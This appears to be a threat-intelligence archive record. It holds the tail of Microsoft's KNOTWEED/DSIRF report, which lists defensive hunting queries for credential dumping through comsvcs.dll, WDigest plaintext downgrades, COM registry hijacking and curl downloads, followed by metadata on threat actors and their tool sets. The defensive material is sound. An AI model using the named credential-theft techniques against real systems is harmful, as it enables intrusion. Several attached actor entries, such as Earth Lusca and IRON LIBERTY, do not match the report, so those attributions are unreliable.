Curl:\r\nhttps://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/MultipleDataSources/DownloadofNewFileUsingCurl.yaml\r\nSuspected credential dumping\r\nThis query looks for attackers using comsvcs.dll to dump credentials from memory:\r\nhttps://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/SecurityEvent/SuspectedLSASSDump.yaml\r\nDowngrade to plaintext credentials\r\nThis query looks for the WDigest registry key being set to enable plaintext credentials:\r\nhttps://github.com/Azure/Azure-Sentinel/blob/master/Detections/SecurityEvent/WDigestDowngradeAttack.yaml\r\nMicrosoft 365 Defender advanced hunting\r\nMicrosoft 365 Defender customers can run 
the following advanced hunting queries to locate IOCs and related malicious\r\nactivity in their environments.\r\nMicrosoft Defender Antivirus detections related to KNOTWEED\r\nThis query identifies detection of related malware and tools by Microsoft Defender Antivirus:\r\nhttps://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Microsoft%20365%20Defender/Campaigns/KNOTWEED/KNOTWEED-AVDetections.yaml\r\nFile hash IOCs related to KNOTWEED\r\nThis query surfaces KNOTWEED file hash IOCs across Microsoft Defender for Endpoint tables:\r\nhttps://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Microsoft%20365%20Defender/Campaigns/KNOTWEED/KNOTWEED-FileHashIOCsJuly2022.yaml\r\nDomain IOCs related to KNOTWEED\r\nThis query identifies matches based on domain IOCs related to KNOTWEED against Microsoft Defender for Endpoint\r\ndevice network connections:\r\nhttps://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Microsoft%20365%20Defender/Campaigns/KNOTWEED/KNOTWEED-DomainIOCsJuly2022.yaml\r\nCOM registry key modified to point to Color Profile folder\r\nThis query identifies modifications to COM registry keys to point to executable files in\r\nC:\\Windows\\System32\\spool\\drivers\\color\\:\r\nhttps://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Microsoft%20365%20Defender/Campaigns/KNOTWEED/KNOTWEED-COMRegistryKeyModifiedtoPointtoColorProfileFolder.yaml\r\nPE file dropped in Color Profile folder\r\nThis query looks for PE files being created in the C:\\Windows\\System32\\spool\\drivers\\color\\ folder:\r\nhttps://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Microsoft%20365%20Defender/Campaigns/KNOTWEED/KNOTWEED-PEFileDroppedinColorProfileFolder.yaml\r\nDownloading new file using Curl\r\nThis query looks for new files being downloaded using 
Curl.\r\nhttps://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Microsoft%20365%20Defender/Campaigns/KNOTWEED/KNOTWEED-DownloadingnewfileusingCurl.yaml\r\nSource: https://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"MISPGALAXY"
	],
	"references": [
		"https://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/"
	],
	"report_names": [
		"untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits"
	],
	"threat_actors": [
		{
			"id": "9f101d9c-05ea-48b9-b6f1-168cd6d06d12",
			"created_at": "2023-01-06T13:46:39.396409Z",
			"updated_at": "2026-04-10T02:00:03.312816Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"CHROMIUM",
				"ControlX",
				"TAG-22",
				"BRONZE UNIVERSITY",
				"AQUATIC PANDA",
				"RedHotel",
				"Charcoal Typhoon",
				"Red Scylla",
				"Red Dev 10",
				"BountyGlad"
			],
			"source_name": "MISPGALAXY:Earth Lusca",
			"tools": [
				"RouterGod",
				"SprySOCKS",
				"ShadowPad",
				"POISONPLUG",
				"Barlaiy",
				"Spyder",
				"FunnySwitch"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "8e3cc644-b09e-4ed2-bdf8-b836e4f21319",
			"created_at": "2024-02-02T02:00:04.014083Z",
			"updated_at": "2026-04-10T02:00:03.523727Z",
			"deleted_at": null,
			"main_name": "Denim Tsunami",
			"aliases": [
				"DSIRF"
			],
			"source_name": "MISPGALAXY:Denim Tsunami",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "1a76ed30-4daf-4817-98ae-87c667364464",
			"created_at": "2022-10-25T16:47:55.891029Z",
			"updated_at": "2026-04-10T02:00:03.646466Z",
			"deleted_at": null,
			"main_name": "IRON LIBERTY",
			"aliases": [
				"ALLANITE ",
				"ATK6 ",
				"BROMINE ",
				"CASTLE ",
				"Crouching Yeti ",
				"DYMALLOY ",
				"Dragonfly ",
				"Energetic Bear / Berserk Bear ",
				"Ghost Blizzard ",
				"TEMP.Isotope ",
				"TG-4192 "
			],
			"source_name": "Secureworks:IRON LIBERTY",
			"tools": [
				"ClientX",
				"Ddex Loader",
				"Havex",
				"Karagany",
				"Loek",
				"MCMD",
				"Sysmain",
				"xfrost"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "18a7b52d-a1cd-43a3-8982-7324e3e676b7",
			"created_at": "2025-08-07T02:03:24.688416Z",
			"updated_at": "2026-04-10T02:00:03.734754Z",
			"deleted_at": null,
			"main_name": "BRONZE UNIVERSITY",
			"aliases": [
				"Aquatic Panda",
				"Aquatic Panda ",
				"CHROMIUM",
				"CHROMIUM ",
				"Charcoal Typhoon",
				"Charcoal Typhoon ",
				"Earth Lusca",
				"Earth Lusca ",
				"FISHMONGER ",
				"Red Dev 10",
				"Red Dev 10 ",
				"Red Scylla",
				"Red Scylla ",
				"RedHotel",
				"RedHotel ",
				"Tag-22",
				"Tag-22 "
			],
			"source_name": "Secureworks:BRONZE UNIVERSITY",
			"tools": [
				"Cobalt Strike",
				"Fishmaster",
				"FunnySwitch",
				"Spyder",
				"njRAT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "6abcc917-035c-4e9b-a53f-eaee636749c3",
			"created_at": "2022-10-25T16:07:23.565337Z",
			"updated_at": "2026-04-10T02:00:04.668393Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Bronze University",
				"Charcoal Typhoon",
				"Chromium",
				"G1006",
				"Red Dev 10",
				"Red Scylla"
			],
			"source_name": "ETDA:Earth Lusca",
			"tools": [
				"Agentemis",
				"AntSword",
				"BIOPASS",
				"BIOPASS RAT",
				"BadPotato",
				"Behinder",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"Doraemon",
				"FRP",
				"Fast Reverse Proxy",
				"FunnySwitch",
				"HUC Port Banner Scanner",
				"KTLVdoor",
				"Mimikatz",
				"NBTscan",
				"POISONPLUG.SHADOW",
				"PipeMon",
				"RbDoor",
				"RibDoor",
				"RouterGod",
				"SAMRID",
				"ShadowPad Winnti",
				"SprySOCKS",
				"WinRAR",
				"Winnti",
				"XShellGhost",
				"cobeacon",
				"fscan",
				"lcx",
				"nbtscan"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "d53593c3-2819-4af3-bf16-0c39edc64920",
			"created_at": "2022-10-27T08:27:13.212301Z",
			"updated_at": "2026-04-10T02:00:05.272802Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Earth Lusca",
				"TAG-22",
				"Charcoal Typhoon",
				"CHROMIUM",
				"ControlX"
			],
			"source_name": "MITRE:Earth Lusca",
			"tools": [
				"Mimikatz",
				"PowerSploit",
				"Tasklist",
				"certutil",
				"Cobalt Strike",
				"Winnti for Linux",
				"Nltest",
				"NBTscan",
				"ShadowPad"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434023,
	"ts_updated_at": 1775792207,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/a7943f166d2ba5893bf3884ab55187e40e5b28ca.pdf",
		"text": "https://archive.orkl.eu/a7943f166d2ba5893bf3884ab55187e40e5b28ca.txt",
		"img": "https://archive.orkl.eu/a7943f166d2ba5893bf3884ab55187e40e5b28ca.jpg"
	}
}